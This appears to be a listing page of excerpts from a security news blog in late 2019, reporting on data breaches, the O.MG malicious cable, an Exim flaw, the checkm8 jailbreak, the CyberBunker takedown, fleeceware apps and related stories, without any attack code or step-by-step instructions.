Another GnosticPlayers feeding frenzy

He/she/they have been in the headlines for gargantuan breaches this year: in March 2019, the hacker(s) put up 26 million records for sale, stolen from six online companies. As we reported then, the first of what would turn out to be four data caches had gone up for sale in early February, when GnosticPlayers tried to sell a database of 617 million records pilfered from 16 companies for $20,000.

Days later, GnosticPlayers added 127 million records stolen from eight websites, before adding a third round on 17 February comprising another 93 million from another eight sites.


O.MG! Evil Lightning cable about to hit mass distribution

By Danny Bradbury

Remember the O.MG cable? Back in February, we covered its early development: A project by self-taught electronics hacker _MG_, it’s a malicious Lightning cable that looks just like the regular overpriced piece of wire that connects your iPhone to a computer.

Embedded in it is a tiny Wi-Fi transceiver that can operate as an access point or a wireless client. When the victim plugs it into their computer, an attacker within radio distance can connect to the cable with a mobile app and use it to manipulate the computer.

An attacker can reach the O.MG cable from 300 feet away using Wi-Fi from a regular phone, but a suitable booster antenna connected to your computer or phone could enable a connection from even further away.

@_MG_ has been steadily working on it along with a team of fellow hackers, and says that he spent over $4,000 on what is effectively a “negative profit project”. He spent months hand-milling the tiny integrated circuit boards and then painstakingly putting them inside the ends of Apple lightning cables. He gave these prototypes away at DEF CON in August 2019. Now, having perfected the performance of the cable and created a design suitable for manufacturing, he is preparing to sell them through penetration testing hardware site, Hak5.

The project has come a long way, with some extensive work on the kinds of payload it can deliver.


Exim suffers another ‘critical’ remote code execution flaw

By John E Dunn

Remember the critical remote code execution (RCE) vulnerability in the Exim email server, CVE-2019-15846, from mid-September?

Barely two weeks later, and the software’s maintainers have issued an advisory for another potentially troublesome bug, identified as CVE-2019-16928, which has been given the same critical rating.

Affecting all Exim versions between and including 4.92 to 4.92.2, this one’s described as:

A heap-based buffer overflow in string_vformat (string.c). The currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message.

The “currently known exploit” refers to a proof of concept created by QAX A-Team, which first reported the flaw.

This could lead to at least a denial of service crash in the software but also, more worryingly, the possibility of remote code execution.

The flaw isn’t being targeted in the wild yet, but there is a risk this might be a matter of time given that it looks relatively easy to exploit.


October 1, 2019 »

Cloudflare adds VPN features to privacy app

By John E Dunn

As promised in April, Cloudflare has finally launched Warp, a consumer mobile privacy app that looks a lot like a VPN without actually being one.

That sounds confusing so let’s start by describing the service itself, which can be accessed via a free Android and iOS app called Warp, and a $4.99 per month subscription app called Warp+.

The first, Warp, is a development of the service and mobile apps launched in 2018 as an alternative DNS resolver that headlined on the theme of privacy – i.e. we don’t log the sites you visit.

More recently, the app added support for the emerging encrypted DNS standards, DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT), which hide the domains people visit from ISPs and anyone else listening in (Mozilla recently integrated this service into Firefox).

Now has become ‘ with Warp’ by adding the ability to encrypt all traffic from the mobile device and not just DNS queries, hence the similarity to a full VPN.

What does the Warp+ subscription add to this? Despite being limited to one device, the user gets unlimited bandwidth and 30% better performance thanks, Cloudflare says, to Warp+ traffic being routed over its global network in an optimized way.

Note that if you signed up for the Warp waiting list via the app, you also get the chance to try Warp+ free of charge with an initial 10GB of data.

If Warp isn’t a VPN, what is it?

Traditional VPNs route a user’s network traffic to a trusted, internet-connected server, via an encrypted ‘tunnel’. The security benefit of a VPN is that it lets a user send traffic via a provider they trust (the VPN company) while hiding it from others they don’t trust (ISPs, Wi-Fi snoopers and bad actors, which can’t).


Hacking 2020 voting systems is a ‘piece of cake’

By Lisa Vaas

It’s still child’s play to pick apart election systems that will be used in the 2020 US presidential election, as ethical hackers did, once again, over the course of two and a half days at the Voting Village corner of the DefCon 27 security conference in August.

The results are sobering. This is the third year they’ve been at it, and security is still abysmal.

On Thursday, Voting Village organizers went to Capitol Hill to release their findings, in an event attended by election security funding boosters Sen. Ron Wyden and Rep. Jackie Speier.

In a nutshell: in August, hackers easily compromised every single one of the more than 100 machines to which they were given access, many with what they called “trivial attacks” that required “no sophistication or special knowledge on the part of the attacker.” They didn’t get their hands on every flavor of voting system in use in the country, but every one of the machines they compromised is currently certified for use in at least one voting jurisdiction, including direct-recording electronic (DRE) voting machines, electronic poll books, Ballot Marking Devices (BMDs), optical scanners and hybrid systems.

From the Voting Village press release:

In too many cases physical ports remain unprotected, passwords remain unset or left in default configurations and security features of the underlying commercial hardware are left unused or even disabled.

Same old, same old

During the three years that Voting Village has tested voting system security, there’s been no shortage of warnings about the potential for tampering with any election systems connected to the internet or to any network. The state of election non-security is serious enough that the Defense Advanced Research Projects Agency (DARPA) is working on it: it’s hoping to create an electronic voting system that it hopes will prevent tampering with voting machines at the polls.


China’s 500-megapixel camera is capable of mega-facial-recognition

By Danny Bradbury

Stop bragging about how many megapixels your snazzy new prosumer DSLR camera has – China has beaten you to it. Researchers there have just announced a 500mp camera. Rather than taking stunning vacation photos, though, one of the most likely uses for this wide-angle, beer crate-sized device is for identifying people dozens of meters away using facial recognition.

Fudan University worked with the Changchun Institute of Optics, Fine Mechanics and Physics of Chinese Academy of Sciences to develop the camera, which takes both pictures and video in unparalleled detail. ABC’s story suggests that this is five times the resolution of the human eye, but scientific imaging specialist Roger Clark says that the human eye has an effective resolution of around 576mp.

Whichever figure you believe, 500 megapixels (or 0.5 billion pixels) is more than enough to pick out faces in a stadium or on a street corner with the camera’s built-in facial recognition techniques.

This should have your privacy alarm bells ringing, but that’s just one part of the story. There’s also the possibility of a link with China’s emerging social credit system (SCS). Designed for a full national rollout in China next year, it assigns points for activities deemed socially acceptable, like donating blood and doing volunteer work, while subtracting them for negative actions like jaywalking or not showing up for restaurant reservations.

Apparently, in some local prototypes, telcos show you a message when calling someone on the social credit system’s blacklist telling you that the person you’re calling is dishonest. We didn’t think that we’d find ourselves living in Black Mirror’s excellent Nosedive episode for a while yet, but oh well, here we are.


Darknet hosting provider in underground NATO bunker busted

By Lisa Vaas

A large piece of the dark web’s spine has been broken: German investigators announced on Friday that they’ve excavated the CyberBunker.

The so-called bulletproof hosting provider, located five floors underground in a heavily fortified, Cold War-era, former NATO bunker in Germany is a data center with around 2,000 servers, dedicated to shielding illegal activity from the eyes of law enforcement.

Thirteen suspects connected to CyberBunker – seven arrested and the rest still at large – are being investigated in connection to the websites hosted by the data center, which involved arms trafficking, trafficking in child abuse imagery and drugs, selling fake documents, marketing stolen data, conducting large-scale cyber-attacks, or, as described by a spokesman for the Rhineland-Palatinate State Office of Criminal Investigation (LKA):

Anything you can imagine on the Darknet.

Prosecutor Jürgen Brauer and regional criminal police chief Johannes Kunz said in a press conference on Friday that the countrywide, nearly five-year, complex investigation is the first time that German police have managed to break the operations of a bulletproof hosting provider.

The accused include 12 men and one woman, aged between 20 and 59. Police have arrested seven men and have issued warrants for the rest of the men and the one woman. Four of the suspects are Dutch, one is Bulgarian and two are German. As well, 18 search warrants have been issued.

Wall Street Market crumbles

So far, investigators have determined that the darknet marketplaces and forums hosted by CyberBunker servers included, for one, the Wall Street Market (WSM): the second-largest marketplace of its kind in the world. An e-commerce site, it was something like an eBay for drugs, police said. They say it handled 250,000 transactions for a total of more than 41 million euros (USD $44.66m, £36.28m).


September 30, 2019 »

Checkm8 jailbreak and AltStore put cracks in Apple’s walled garden

By Danny Bradbury

Jailbreaking iPhones has become a lot harder with each new version of the hardware, but this weekend saw two new announcements that enable people to install apps on their phones. One of them is a traditional jailbreak, while the other is an alternative app store that uses a loophole in Apple’s code-signing process.

Jailbreaking is a form of privilege escalation. Hackers figure out ways to change the operating system kernel, unlocking features that Apple had locked down. One of its most common uses is to install apps that Apple doesn’t allow into its app store because they fall outside the company’s strict developer review policy.

On Twitter last Friday, iOS security researcher @axi0mX released a jailbreak bug that affected devices from Apple’s iPhone X all the back to the iPhone 4S running Apple’s A5 chip, which the company released in 2011. It doesn’t hit the iPhone 11 family announced this month, powered by the company’s new A13 chip.

The code, released on GitHub for free, relies on a race condition in Apple’s bootrom. This is the first piece of hardware that the iPhone loads code from when it is turned on, and it’s a read-only part of the hardware that Apple can’t patch.

To prove the point, @axi0mX also tweeted a video of an iPhone booting in verbose mode, using the latest iOS 13.1.1 version. They labelled the jailbreak checkm8, and said that it is a “permanent unpatchable bootrom exploit for hundreds of millions of iOS devices.”


Social media manipulation as a political tool is spreading

By Lisa Vaas

Social media manipulation is getting worse: as more governments use it to manipulate public opinion, it’s becoming a rising threat to democracy, according to a new report from the Oxford Internet Institute.

There’s nothing new about political parties and governments using propaganda, but the new normal includes toxic messaging that’s easy to spread on a global scale with the brawny new tools for targeting and amplification, they said.

According to the University of Oxford’s Computational Propaganda Research Project, the use of algorithms, automation, and big data to shape public opinion – i.e. computational propaganda – is becoming “a pervasive and ubiquitous part of everyday life.”

For its third annual report, the project examined what it calls “cyber troop” activity in 70 countries. Cyber troops is the collective term for government or political party actors that use social media to manipulate public opinion, harass dissidents, attack political opponents or spread polarizing messages meant to divide societies, among other things.

Over the past two years, there’s been a 150% increase in the number of countries using social media to launch manipulation campaigns, the project found.

The use of computational propaganda to shape public attitudes via social media has become mainstream, extending far beyond the actions of a few bad actors. In an information environment characterized by high volumes of information and limited levels of user attention and trust, the tools and techniques of computational propaganda are becoming a common – and arguably essential – part of digital campaigning and public diplomacy.

What accounts for the growth?

Part of the growth can be attributed to observers getting more sophisticated when it comes to identifying and reporting such manipulation campaigns, given digital tools and a more precise vocabulary to describe the cyber troop activity they uncover, the researchers said.


Is the era of social media Likes over?

By Lisa Vaas

Cast your mind back to 2014, and you might recall Mark Zuckerberg mulling the public’s desire to have a “dislike” button on Facebook.

During a public Q&A, the CEO presented button semantics as being something like a Marvel comics battle between good and evil, with the Like button presumably being, to his mind, a “force for good”:

There’s something that’s just so simple about the ‘like’ button’ … but giving people more ways of expressing more emotions would be powerful. We need to figure out the right way to do it so it ends up being a force for good, not a force for bad and demeaning the posts that people are putting out there.

But now, as a mounting body of research points to the number of content Likes – or lack thereof – negatively influencing some users’ self-esteem, it may be time to question whether the Like button might have turned out to be a force for bad.

Recent studies have linked increased depression, poor sleeping habits, and unhealthy body image in children and teens with higher use of social media and digital devices.

To address the mess they’ve made, at this point, Instagram – which a 2017 study found to be the worst social media app for young people’s mental health – and Facebook are taking a serious look at the possibility of doing away with Likes.

In April 2019, Instagram announced that it was running a test in Canada: it was hiding Like counts on some users’ photos and videos as an experiment to try to lessen competitiveness on the platform.

The idea: to make us feel less envious, less ashamed, and more focused on self-expression rather than like we’re vying in a personality competition. It’s all about getting people to focus on the content they share, not the likes, a spokesperson said when news about the test was announced at F8, Facebook’s annual developers conference:


‘Fleeceware’ Play store apps quietly charging up to $250

By John E Dunn

Imagine an Android GIF-making app available on Google Play that automatically charges €214.99 ($253) to continue using it beyond its three-day trial period.

Or how about a completely unremarkable QR code reader app, whose developer thinks that a charge of €104.99 is a fair price to continue using it 72 hours after it was downloaded.

If you think these prices sound far-fetched, we have news – researchers at SophosLabs have discovered at least 15 apps which have been downloaded millions of times between them charging these extraordinary prices under Google’s nose.

The most unexpected part of this discovery? By exploiting a loophole in the Play store licensing regime, this behavior appears to be legal.

Getting away with it

The scam works by exploiting the legitimate app behavior of allowing users to download apps under a trial license period which, in this case, ends after a few days.

There is nothing obviously malicious about the apps, which mostly work as advertised, albeit that their features are identical to advertising-supported apps that cost nothing.

Importantly, the apps ask users to submit their payment details during the trial period, which most users probably assume won’t apply if they de-install the app.

Because the huge annual subscription price is only mentioned in small print, users probably assume the cost will be a few dollars or euros.

SophosLabs’ researchers discovered three apps charging €219.99 for full licenses, with another five charging €104.99, and one charging €114.99.

One of these ‘fleeceware’ apps had more than 10 million downloads, two had 5 million, with the rest between 5,000 and 50,000.


Apple users, patch now! The ‘bug that got away’ has been fixed

By Paul Ducklin

Remember the Black Hat conference of 2019?

Chances are you didn’t attend – even though it’s a huge event, the vast majority of cybersecurity professionals only experience it remotely – but you probably heard about some of the more dramatic talk titles…

…including one from Google with the intriguing title Look, no hands! – The remote, interaction-less attack surface of the iPhone.

The talk was presented by well-known Google Project Zero researcher Natalie Silvanovich, and it covered a wide-ranging vulnerability research project conduced by Silvanovich and her colleague Samuel Groß.

They decided to dig into the software components in your iPhone that automatically process data uploaded from the outside, to see if they could find bugs that might be remotely exploitable.

Silvanovich and Groß investigated five message-handling components on the iPhone: SMS, MMS, Visual voicemail, email and iMessage.

The idea was to search not for security bugs by which you could be tricked into making a serious security blunder, but for holes by which your device itself could be tricked without you even being involved.

They found several such flaws, denoted by the following CVE numbers: CVE-2019-8624, -8641, -8647, -8660, -8661, -8662, and -8663.


Chrome cripple’s movie studio Mac Pros

By Danny Bradbury

It’s not often that a single software bug can bring an entire industry to a virtual standstill, but it happened this week – and experts finally found an unlikely culprit.

The problem began on Monday 22 September when reports emerged of a problem with Macs running Avid software.

Avid is an editing suite that production companies use to put movies and TV programs together. A few days ago, movie editors started reporting that Mac Pros running Avid software were crashing. If users tried to restart their machines, they wouldn’t reboot.

Here’s one tweet from Shane Ross, staff editor at Prometheus Entertainment, as the situation broke:

Imagine how you’d be feeling if you were working on something with a deadline of hours, like a news segment.

Props to Avid, which was all over this problem from the beginning, dropping everything to work out the issue, in a perfect example of how to handle a technical issue properly. The company even put up a video:


« older